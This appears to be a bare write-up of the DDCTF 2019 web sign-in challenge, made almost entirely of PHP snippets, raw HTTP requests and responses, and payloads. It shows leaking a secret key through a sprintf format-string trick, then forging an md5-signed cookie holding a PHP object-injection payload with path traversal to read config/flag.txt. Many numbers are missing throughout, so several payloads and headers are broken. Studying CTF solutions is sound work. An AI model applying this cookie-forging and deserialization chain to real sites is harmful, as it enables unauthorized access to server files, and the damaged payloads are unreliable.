DDCTF WEB 签到题

        $hash = substr($session,strlen($session)-32);
        $session = substr($session,,strlen($session)-32);

        if($hash !== md5($this->eancrykey.$session)) {
            parent::response("the cookie data not match",'error');
            return FALSE;
        }

GET /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
didictf_username: admin
Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; BL_D_PROV=undefined; BL_T_PROV=undefined
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

ddctf_id=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227ff2d9fa4b9f72700aa0787fbb60c03e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A11%3A%22110.83.19.7%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A82%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.14%3B+rv%3A66.0%29+Gecko%2F20100101+Firefox%2F66.0%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D782e78e81fcebe135f54c659a32a31e6

a:4:{s::"session_id";s::"7ff2d9fa4b9f72700aa0787fbb60c03e";s::"ip_address";s::"110.83.19.7";s::"user_agent";s::"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0";s::"user_data";s::"";}782e78e81fcebe135f54c659a32a31e6

public function __destruct() {
    if(empty($this->path)) {
        exit();
    }else{
        $path = $this->sanitizepath($this->path);
        if(strlen($path) !== ) {
            exit();
        }
        $this->response($data=file_get_contents($path),'Congratulations');
    }
    exit();
}
}

O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}+md5

if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
}

POST /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/ Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-aliv
didictf_username: admin
Upgrade-Insecure-Requests: 
Cookie: ddctf_id=a%A4%A%Bs%A10%A%session_id%%Bs%A32%A%d6422e9e796e957c70ade5%%Bs%A10%A%ip_address%%Bs%A11%A%22110.83.19.7%%Bs%A10%A%user_agent%%Bs%A82%A%Mozilla%F5.0+%Macintosh%B+Intel+Mac+OS+X+10.14%B+rv%A66.0%+Gecko%F20100101+Firefox%F66.0%%Bs%A9%A%user_data%%Bs%A0%A%%%B%D3e0de25e5c5ec1fa2a3c9243ed5e5e19
Cache-Control: max-age=
Content-Type: application/x-www-form-urlencoded
Content-Length: 

nickname=%s

HTTP/1.1  OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue,  Apr  :: GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 

{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Welcome","data":"Welcome my friend EzblrbNS\r\n"}{"errMsg":"sucess","data":"DiDI Welcome you Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko\/20100101 Firefox\/66.0"}

O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}

EzblrbNSO:11:"Application":1:{s::"path";s::"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2

O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}e5de768d30d12a3d53ba10235b5712a7

O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22..././config/flag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2

{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Congratulations","data":"DDCTF{ddctf2019_G4uqwj6E_pHVlHIDDGdV8qA2j}"}